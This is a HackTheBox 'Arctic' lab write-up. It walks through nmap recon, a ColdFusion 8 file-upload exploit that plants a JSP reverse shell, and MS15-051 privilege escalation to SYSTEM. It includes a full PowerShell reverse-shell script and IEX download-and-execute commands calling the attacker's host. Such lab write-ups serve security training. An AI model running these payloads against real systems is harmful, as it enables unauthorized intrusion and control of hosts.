
Getting Admin on Arctic - 'Arctic' HTB Writeup
Getting Admin on Arctic - ‘arctic’ HTB Writeup
Host Information
Hostname | IP Address | Operating System | Difficulty Level |
Arctic | 10.10.10.11 | Windows | Easy |
Writeup Contents:
(you can jump to the section using these links)
Initial Recon
Again, we start with our initial recon of the target system. We’ll use the same enumeration automation script we used on a few other recent boxes - nmapAutomator. You can find and download the script here on Github.
Let’s run a full scan against the target:
root@kali:/writeups/HTB/arctic/enumeration# nmapAutomator.sh 10.10.10.11 all
Running a all scan on 10.10.10.11
Host is likely running Windows
---------------------Starting Nmap Quick Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 18:02 CST
Nmap scan report for 10.10.10.11
Host is up (0.041s latency).
Not shown: 997 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
135/tcp open msrpc
8500/tcp open fmtp
49154/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 5.39 seconds
---------------------Starting Nmap Basic Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 18:02 CST
Nmap scan report for 10.10.10.11
Host is up (0.038s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.25 seconds
----------------------Starting Nmap UDP Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 18:04 CST
Nmap scan report for 10.10.10.11
Host is up.
All 1000 scanned ports on 10.10.10.11 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 201.38 seconds
---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 18:08 CST
Initiating Parallel DNS resolution of 1 host. at 18:08
Completed Parallel DNS resolution of 1 host. at 18:08, 0.01s elapsed
Initiating SYN Stealth Scan at 18:08
Scanning 10.10.10.11 [65535 ports]
Discovered open port 135/tcp on 10.10.10.11
SYN Stealth Scan Timing: About 11.75% done; ETC: 18:12 (0:03:53 remaining)
SYN Stealth Scan Timing: About 23.18% done; ETC: 18:12 (0:03:22 remaining)
SYN Stealth Scan Timing: About 34.61% done; ETC: 18:12 (0:02:52 remaining)
Discovered open port 8500/tcp on 10.10.10.11
SYN Stealth Scan Timing: About 46.04% done; ETC: 18:12 (0:02:22 remaining)
Discovered open port 49154/tcp on 10.10.10.11
SYN Stealth Scan Timing: About 57.46% done; ETC: 18:12 (0:01:52 remaining)
SYN Stealth Scan Timing: About 68.89% done; ETC: 18:12 (0:01:22 remaining)
SYN Stealth Scan Timing: About 80.32% done; ETC: 18:12 (0:00:52 remaining)
Completed SYN Stealth Scan at 18:12, 262.68s elapsed (65535 total ports)
Nmap scan report for 10.10.10.11
Host is up (0.040s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
8500/tcp open fmtp
49154/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.76 seconds
Raw packets sent: 131268 (5.776MB) | Rcvd: 204 (8.976KB)
No new ports
---------------------Starting Nmap Vulns Scan---------------------
Running CVE scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 18:12 CST
/usr/local/bin/nmapAutomator.sh: line 226: 1892 Segmentation fault $nmapType -sV --script vulners --script-args mincvss=7.0 -p$(echo "${ports}") -oN nmap/CVEs_"$1".nmap "$1"
Running Vuln scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 18:12 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.11
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8500/tcp open fmtp?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.66 seconds
---------------------Recon Recommendations----------------------
---------------------Finished all Nmap scans---------------------
Completed in 12 minute(s) and 48 second(s)
OK, so it looks like we have a Windows host, with 3 open ports, 2 RPC ports, and 8500, which nmap tentatively labels as ‘ftmp.’
Let’s see if another quick nmap scan reveals anything further:
root@kali:/writeups/HTB/arctic/enumeration# nmap -sC -sV -O --osscan-guess -p 135,8500,49154 -oA further_nmap_arctic 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 18:36 CST
Nmap scan report for 10.10.10.11
Host is up (0.041s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.80 seconds
Not really; we know that the OS is Windows 7 or Server 2012 or later. OK, let’s move along.
taking a look at FMTP
I’m not familiar with this fmtp service, so let’s do a quick websearch. It seems that this port is labeled as “Flight Message Transfer Protocol,” but is also used by Macromedia/Adobe ColdFusion. source here and ]another one here](https://www.quora.com/What-is-FMTP). I’m going to guess given the context of the box we’re looking it, it probably has something to do with ColdFusion, rather than transfer flight data processing info over P2P comms based on the TCP/IP stack.
So this port in parcticular seems to stsick out, let’s see if there’s anything on searchsploit for “fmtp” or “coldfusion”
root@kali:/writeups/HTB/arctic/enumeration# searchsploit fmtp
--------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------- ----------------------------------------
Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service | exploits/linux/dos/44183.py
--------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
OK, so a DoS is not what we want.
Doing a searchploit search for “ColdFusion” seems to turn up a decent number results. Let’s see if we can somehow confirm if ColdFusion is running enumerate what version of it is on the system.
Going to the URI http://10.10.10.11:8500/
in the browser seems to yield a hint it might indeed be ColdFusion. And, ah, that would make sense why the box is named arctic. :)
Index of /
CFIDE/ dir 03/22/17 08:52 μμ
cfdocs/ dir 03/22/17 08:55 μμ
Let’s see if any of these subdirectories or files have a clue as to the version that might be running.
From going to cfdocs > dochome at http://10.10.10.11:8500/cfdocs/
we see that apparently ColdFusion 8 is installed.
OK, so let’s refine our searchsploit query to “ColdFusion 8”
root@kali:/writeups/HTB/arctic/enumeration# searchsploit coldfusion 8
--------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------- ----------------------------------------
Adobe ColdFusion - Directory Traversal (Metasploit) | exploits/multiple/remote/16985.rb
Adobe ColdFusion 2018 - Arbitrary File Upload | exploits/multiple/webapps/45979.txt
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query Str | exploits/cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizard | exploits/cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' | exploits/cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.c | exploits/cfm/webapps/33168.txt
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserializatio | exploits/windows/remote/43993.py
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | exploits/cfm/webapps/16788.rb
ColdFusion MX - Missing Template Cross-Site Scripting | exploits/cfm/remote/21548.txt
Macromedia ColdFusion MX 6.0 - Remote Development Service File Discl | exploits/multiple/remote/22867.pl
--------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
exploiting ColdFusion
The following entry looks promising:
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)
If we can upload and execute abitrary files, it’s almost certain we could upload and execute a reverse shell payload. Unfortunately, that seems to be a Metasploit module, which we’re trying to avoid using. Let’s see if we can find a ‘manual’ equivalent on the web, and if not, we’ll look at some other exploits.
Going to the ExploitDB link for this exploit gives us the CVE number: 2009-2265.
And one of the first links on Google seems to be a standalone PoC for this exploit (from the HTB forums, nontheless!)
Let’s copy it to our exploits folder and give it a run.
Looks like the usage example is simple enough:
# Usage: ./exploit.py <target ip> <target port> [/path/to/coldfusion] </path/to/payload.jsp>
# Example: ./exploit.py 127.0.0.1 8500 /home/arrexel/shell.jsp
OK, so let’s see if we can find a JSP reverse shell. A quick search shows that there’s already one in kali:
root@kali:/writeups/HTB/arctic/exploits# ll /usr/share/webshells/jsp/jsp-reverse.jsp
-rw-r--r-- 1 root root 2451 Jul 17 2019 /usr/share/webshells/jsp/jsp-reverse.jsp
Let’s go ahead and copy it to our local folder, and take a look.
root@kali:/writeups/HTB/arctic/exploits# cp /usr/share/webshells/jsp/jsp-reverse.jsp shell.jsp
Looking through the code, at first glance it looks like the webshell will give us the option to define our IP address and port on the webpage, then hit a connect button. Let’sgo ahead and try it to see if it works:
root@kali:/writeups/HTB/arctic/exploits# python ./CF_afu.py 10.10.10.11 8500 /writeups/HTB/arctic/exploits/shell.jsp
Sending payload...
Successfully uploaded payload!
Find it at http://10.10.10.11:8500/userfiles/file/exploit.jsp
Let’s go ahead and start a listener on port 43110, in case the shell works:
root@kali:~# nc -lvnp 43110
listening on [any] 43110 ...
Now let’s browse to the URL.
Looks like we get an error:
500
(6,2) Unable to scan the character ' ' which follows '%'
jrun.jsp.parser.TokenMgrError: (6,2) Unable to scan the character ' ' which follows '%'
at jrun.jsp.parser.JSPParserTokenManager.getNextToken(JSPParserTokenManager.java:2086)
at jrun.jsp.parser.JSPParser.jj_ntk(JSPParser.java:1030)
at jrun.jsp.parser.JSPParser.directive(JSPParser.java:105)
at jrun.jsp.parser.JSPParser.jsp(JSPParser.java:40)
at jrun.jsp.parser.JSPParserBase.parse(JSPParserBase.java:38)
at jrun.jsp.compiler.JSPCompiler.compile(JSPCompiler.java:94)
at jrun.jsp.Translator.parsePage(Translator.java:143)
at jrun.jsp.Translator.translate(Translator.java:252)
at jrun.jsp.Translator.translate(Translator.java:101)
at jrun.jsp.JSPEngine.translateJSP(JSPEngine.java:707)
at jrun.jsp.JSPServlet.translate(JSPServlet.java:125)
at jrun.jsp.JSPServlet.service(JSPServlet.java:113)
at jrun.servlet.ServletInvoker.invoke(ServletInvoker.java:106)
at jrun.servlet.JRunInvokerChain.invokeNext(JRunInvokerChain.java:42)
at jrun.servlet.JRunRequestDispatcher.invokeNext(JRunRequestDispatcher.java:586)
at jrun.servlet.JRunRequestDispatcher.forwardInvoke(JRunRequestDispatcher.java:555)
at jrun.servlet.JRunNamedDispatcher.forward(JRunNamedDispatcher.java:64)
at coldfusion.license.JspLicenseServlet.service(Unknown Source)
at coldfusion.bootstrap.BootstrapServlet.service(BootstrapServlet.java:89)
at jrun.servlet.ServletInvoker.invoke(ServletInvoker.java:106)
at jrun.servlet.JRunInvokerChain.invokeNext(JRunInvokerChain.java:42)
at jrun.servlet.JRunRequestDispatcher.invoke(JRunRequestDispatcher.java:286)
at jrun.servlet.ServletEngineService.dispatch(ServletEngineService.java:543)
at jrun.servlet.http.WebService.invokeRunnable(WebService.java:172)
at jrunx.scheduler.ThreadPool$DownstreamMetrics.invokeRunnable(ThreadPool.java:320)
at jrunx.scheduler.ThreadPool$ThreadThrottle.invokeRunnable(ThreadPool.java:428)
at jrunx.scheduler.ThreadPool$UpstreamMetrics.invokeRunnable(ThreadPool.java:266)
at jrunx.scheduler.WorkerThread.run(WorkerThread.java:66)
gaining a foothold
Let’s try a different JSP shell; we can generate one using msfvenom:
root@kali:/writeups/HTB/arctic/exploits# msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.14.50" LPORT=43110 -f raw > shell.jsp
Payload size: 1498 bytes
root@kali:/writeups/HTB/arctic/exploits# python ./CF_afu.py 10.10.10.11 8500 /writeups/HTB/arctic/exploits/shell.jsp
Sending payload...
Successfully uploaded payload!
Find it at http://10.10.10.11:8500/userfiles/file/exploit.jsp
Going to the URL in the browser, as expected, has the page just loading. And if we check our netcat listener, we see we have a shell:
root@kali:~# nc -lvnp 43110
listening on [any] 43110 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.11] 49180
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>
We see we’re a user called tolis, so let’s see if we can grab the user flag:
C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis
C:\ColdFusion8\runtime\bin>cd c:\users\tolis
cd c:\users\tolis
c:\Users\tolis>dir
dir
Volume in drive C has no label.
Volume Serial Number is F88F-4EA5
Directory of c:\Users\tolis
22/03/2017 09:00 �� <DIR> .
22/03/2017 09:00 �� <DIR> ..
22/03/2017 09:00 �� <DIR> Contacts
22/03/2017 09:00 �� <DIR> Desktop
22/03/2017 09:00 �� <DIR> Documents
22/03/2017 09:00 �� <DIR> Downloads
22/03/2017 09:00 �� <DIR> Favorites
22/03/2017 09:00 �� <DIR> Links
22/03/2017 09:00 �� <DIR> Music
22/03/2017 09:00 �� <DIR> Pictures
22/03/2017 09:00 �� <DIR> Saved Games
22/03/2017 09:00 �� <DIR> Searches
22/03/2017 09:00 �� <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 33.184.948.224 bytes free
c:\Users\tolis>cd Desktop
cd Desktop
c:\Users\tolis\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is F88F-4EA5
Directory of c:\Users\tolis\Desktop
22/03/2017 09:00 �� <DIR> .
22/03/2017 09:00 �� <DIR> ..
22/03/2017 09:01 �� 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 33.184.944.128 bytes free
c:\Users\tolis\Desktop>type user.txt
type user.txt
{myflag;getyourown:)}
c:\Users\tolis\Desktop>
Privilege Escalation
further enumeration for PrivEsc
Now we need to see how we can privesc. First let’s get a bit more information on the system with the systeminfo
command:
c:\Users\tolis\Desktop>systeminfo
systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45 ��
System Boot Time: 4/2/2020, 1:06:47 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 94 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 963 MB
Virtual Memory: In Use: 1.084 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.11
Great, so it’s a 2008R2 box, with no service packs or hotfixes detected.
The system likely has powershell on it, being a 2008 box, so let’s use a script we’ve used before to do some enumeration and vulnerability scanning, called Sherlock.ps1
Let’s save that in our enuemration folder and serve the content over SimpleHTTP, making sure the Find-AllVUlns function is invoked at the bottom:
root@kali:~/Dropbox/Documents/writeups/HTB/arctic/enumeration# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
And from the Arctic user shell:
powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.50:8080/Sherlock.ps1')"
We get the following results:
C:\ColdFusion8\runtime\bin>powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.50:8080/Sherlock.ps1')"
powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.50:8080/Sherlock.ps1')"
Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems
Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable
Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable
Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems
Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
Title : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
6-034?
VulnStatus : Not Vulnerable
Title : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
ample-Exploits/MS16-135
VulnStatus : Not Vulnerable
Title : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID : 2017-7199
Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h
tml
VulnStatus : Not Vulnerable
gaining admin on arctic
Let’s give the following entry a shot:
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
Looking up the CVE number gives us this github PoC source from hfiref0x pretty quickly.
Let’s download the compiled x64 version to our exploits folder, and host the file with simpleHTTP:
root@kali:/writeups/HTB/arctic/exploits# wget https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe
--2020-02-02 23:32:52-- https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe
Resolving github.com (github.com)... 192.30.253.113
Connecting to github.com (github.com)|192.30.253.113|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/rootphantomer/exp/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe [following]
--2020-02-02 23:32:53-- https://raw.githubusercontent.com/rootphantomer/exp/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.32.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.32.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 55296 (54K) [application/octet-stream]
Saving to: ‘ms15-051.exe’
ms15-051.exe 100%[=========================================>] 54.00K --.-KB/s in 0.04s
2020-02-02 23:32:53 (1.34 MB/s) - ‘ms15-051.exe’ saved [55296/55296]
root@kali:~/Dropbox/Documents/writeups/HTB/arctic/exploits# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
Now, similarly to before, let’s have powershell on the target system ‘Arctic’ download file:
c:\Users\tolis\Desktop>powershell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.50:8080/ms15-051.exe','C:\users\tolis\Desktop\ms15-051.exe')
powershell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.50:8080/ms15-051.exe','C:\users\tolis\Desktop\ms15-051.exe')
c:\Users\tolis\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is F88F-4EA5
Directory of c:\Users\tolis\Desktop
04/02/2020 03:33 �� <DIR> .
04/02/2020 03:33 �� <DIR> ..
04/02/2020 03:33 �� 55.296 ms15-051.exe
22/03/2017 09:01 �� 32 user.txt
2 File(s) 55.328 bytes
2 Dir(s) 33.184.419.840 bytes free
c:\Users\tolis\Desktop>
I also tried this exploit in my writeup of HTB ‘Bounty’ and you can find more info on how to use the exploit at this link. Essentially we need to pass another command to the executable that will be run with elevated privileges. There’s a good reverse TCP connect powershell script I like to use for this, I believe it’s part of the empire framework.
Here’s the script:
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.
.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
Also, a standard netcat can connect to this script Bind to a specific port.
The script is derived from Powerfun written by Ben Turner & Dave Hardy
.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.
.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on
the given IP and port.
.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444
Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port.
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444
Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be
listening on the given IP and port.
.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
https://github.com/nettitude/powershell/blob/master/powerfun.ps1
https://github.com/samratashok/nishang
#>
[CmdletBinding(DefaultParameterSetName="reverse")] Param(
[Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
[String]
$IPAddress,
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
[Int]
$Port,
[Parameter(ParameterSetName="reverse")]
[Switch]
$Reverse,
[Parameter(ParameterSetName="bind")]
[Switch]
$Bind
)
try
{
#Connect back if the reverse switch is used.
if ($Reverse)
{
$client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
}
#Bind to the provided port if Bind switch is used.
if ($Bind)
{
$listener = [System.Net.Sockets.TcpListener]$Port
$listener.start()
$client = $listener.AcceptTcpClient()
}
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
try
{
#Execute the command on the target.
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
}
catch
{
Write-Warning "Something went wrong with execution of command on the target."
Write-Error $_
}
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x
#Return the results
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
if ($listener)
{
$listener.Stop()
}
}
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.50 -Port 4444
running the exploit
Let’s copy it to our exploits directory, and serve the directory with SimpleHTTP again.
From here, we should be able run the exploit exe file (if it works) to have powershell on the ‘arctic’ system grab and execute the remote file system.ps1. This should call the Invoke-PowershellTCP
function of the script, and hopefull, generate a root shell back to a listener of ours.
So let’s go ahead and start a local listener with nc -lvnp 4444
, then execute the exploit to see what we get:
c:\Users\tolis\Desktop>.\ms15-051.exe "cmd.exe /c powershell.exe -c IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.50:8080/system.ps1')"
.\ms15-051.exe "cmd.exe /c powershell.exe -c IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.50:8080/system.ps1')"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 1972 created.
==============================
And checking our listener:
root@kali:/writeups/HTB/arctic/exploits# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.11] 49319
Windows PowerShell running as user tolis on ARCTIC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\tolis\Desktop>whoami
nt authority\system
Nice, we got Admin on Arctic! From here we can grab the root flag and call it a day:
PS C:\Users\tolis\Desktop> cd c:\users\Administrator\Desktop
PS C:\users\Administrator\Desktop> dir
Directory: C:\users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 22/3/2017 9:02 ?? 32 root.txt
PS C:\users\Administrator\Desktop>
Conclusion
Recommended Remediations
-
Update the ColdFusion install to help protect against known exploits, such as the arbitrary file upload & execution on ColdFusion 8.1
-
Patch the Widnows system to protect against kernel exploits and other security vulnerablities.
All for now; until next time.
~@initinfosec
Let me know what you think of this article on twitter @initinfosec or leave a comment below!